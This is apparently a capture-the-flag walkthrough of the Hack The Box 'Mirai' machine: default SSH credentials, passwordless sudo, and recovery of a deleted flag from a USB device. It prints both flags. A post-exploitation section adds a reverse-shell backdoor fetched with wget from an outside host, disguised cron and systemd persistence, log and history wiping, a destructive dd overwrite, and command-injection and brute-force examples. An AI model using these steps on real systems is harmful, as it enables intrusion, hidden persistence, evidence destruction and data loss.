Machine Synopsis
Key Exploitation Techniques:
- Default SSH credentials for IoT devices (Raspberry Pi)
- Sudo misconfiguration (
NOPASSWD: ALL
) for immediate root access - File system forensics using
df
and strings
for deleted data recovery - USB device analysis and data reconstruction
Reconnaissance & Enumeration
Port Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| $ nmap -sC -sV -A 10.10.10.48
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
|
IoT Device Identification
Key Indicators:
- dnsmasq DNS service (common on IoT devices)
- lighttpd web server (lightweight, IoT-friendly)
- SSH version patterns consistent with Raspberry Pi
Web Application Analysis
1
2
3
4
5
6
| # Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts
# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 - 0B - /admin -> http://mirai.htb/admin/
|
Accessing /admin
reveals a Raspberry Pi dashboard/control interface, confirming IoT device identification.
Exploitation
Default Credential Testing
IoT devices, particularly Raspberry Pi systems, often retain default credentials:
Common Raspberry Pi Defaults:
pi:raspberry
pi:pi
admin:admin
1
2
3
4
5
6
7
8
| # Test default SSH credentials
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux
|
Success: Default credentials pi:raspberry
provide immediate SSH access.
User Flag Retrieval
1
2
3
4
5
6
| pi@raspberrypi:~ $ ls
background.jpg Documents Music Pictures python_games Videos
Desktop Downloads oldconffiles Public Templates
pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d
|
Privilege Escalation
Sudo Enumeration
1
2
3
4
5
6
7
8
| pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
|
Critical Misconfiguration: User pi
has unrestricted sudo access without password requirements.
Root Access
1
2
3
4
5
| pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
|
Root Flag Investigation
1
2
| root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
|
Challenge: Original root flag has been deleted, backup exists on USB device.
Digital Forensics & Data Recovery
File System Analysis
1
2
3
4
5
6
7
8
9
10
11
| # List mounted filesystems
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/root 1.3G 1.1G 143M 89% /
devtmpfs 483M 0 483M 0% /dev
tmpfs 487M 0 487M 0% /dev/shm
tmpfs 487M 13M 475M 3% /run
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 487M 0 487M 0% /sys/fs/cgroup
/dev/mmcblk0p1 41M 21M 19M 53% /boot
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
|
Key Finding: USB stick mounted at /media/usbstick
(device /dev/sdb
)
USB Device Investigation
1
2
3
4
5
6
7
8
9
10
11
12
13
| root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
|
Data Recovery using strings
1
2
3
4
5
6
7
8
9
10
11
12
| # Use strings to recover deleted data from raw device
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
|
Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b
Post-Exploitation Techniques
Persistence Methods
SSH Key Persistence
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f mirai_persistence
# Install as pi user
# mkdir -p /home/pi/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /home/pi/.ssh/authorized_keys
# chmod 600 /home/pi/.ssh/authorized_keys
# chown pi:pi /home/pi/.ssh/authorized_keys
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
|
Cron Backdoor
1
2
3
4
5
6
7
| # Create reverse shell payload
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
# Install persistent cron job
# wget 10.10.14.6/backdoor -O /usr/bin/.system-update
# chmod +x /usr/bin/.system-update
# echo "*/15 * * * * /usr/bin/.system-update" >> /etc/crontab
|
Service Installation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # Create systemd service for persistence
# cat > /etc/systemd/system/system-monitor.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
# Enable service
# systemctl enable system-monitor.service
# systemctl start system-monitor.service
|
Defense Evasion
Log Sanitization
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/messages
# > /var/log/wtmp
# > /var/log/lastlog
# Clear command histories
# > /root/.bash_history
# > /home/pi/.bash_history
# Clear DNS logs
# > /var/log/dnsmasq.log
|
Configuration Hardening (Anti-Forensics)
1
2
3
4
5
| # Disable USB mounting
# echo "blacklist usb_storage" >> /etc/modprobe.d/blacklist.conf
# Secure deleted data
# dd if=/dev/urandom of=/dev/sdb bs=1M count=10
|
IoT-Specific Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
| # Raspberry Pi model identification
# cat /proc/cpuinfo | grep -E "(Hardware|Revision|Model)"
Hardware : BCM2835
Revision : a02082
Model : Raspberry Pi 3 Model B Rev 1.2
# GPIO pin status
# cat /sys/kernel/debug/gpio
# Temperature monitoring
# /opt/vc/bin/vcgencmd measure_temp
temp=42.8'C
|
Network Interface Analysis
1
2
3
4
5
6
7
| # Wireless interface enumeration
# iwconfig
# iw dev
# Bluetooth devices
# hciconfig
# bluetoothctl list
|
IoT Service Discovery
1
2
3
4
5
6
7
8
| # Check for IoT-specific services
# systemctl list-units | grep -E "(gpio|i2c|spi|uart)"
# Examine boot configuration
# cat /boot/config.txt | grep -v "^#"
# Check for camera module
# /opt/vc/bin/vcgencmd get_camera
|
Alternative Exploitation Methods
Web Interface Exploitation
1
2
3
4
5
6
7
| # If admin panel is accessible, test for:
# - Default web credentials (admin:admin, admin:password)
# - Command injection in configuration forms
# - File upload vulnerabilities
$ curl -X POST http://mirai.htb/admin/config.php \
-d "command=; id; #"
|
Brute Force Alternative Credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Common IoT credential combinations
$ cat > iot_creds.txt << 'EOF'
pi:raspberry
pi:pi
admin:admin
admin:password
root:raspberry
root:root
user:user
EOF
# Automated SSH brute force
$ hydra -C iot_creds.txt ssh://10.10.10.48 -t 4
|
USB Forensics Alternative Methods
1
2
3
4
5
6
7
| # Alternative data recovery tools
# photorec /dev/sdb # GUI-based recovery
# testdisk /dev/sdb # Partition recovery
# dd if=/dev/sdb | xxd | grep -A5 -B5 "root.txt"
# File carving with scalpel
# scalpel -b -o recovery_output /dev/sdb
|
Network Service Exploitation
1
2
3
4
5
6
7
| # DNS service enumeration
$ dig @10.10.10.48 mirai.htb
$ nslookup mirai.htb 10.10.10.48
# HTTP service exploitation
$ nikto -h http://mirai.htb
$ dirb http://mirai.htb /usr/share/dirb/wordlists/common.txt
|
Hardware-Specific Attacks
1
2
3
4
5
| # If physical access available:
# - SD card extraction and mounting
# - UART/Serial console access
# - GPIO manipulation for hardware backdoors
# - Boot process interruption
|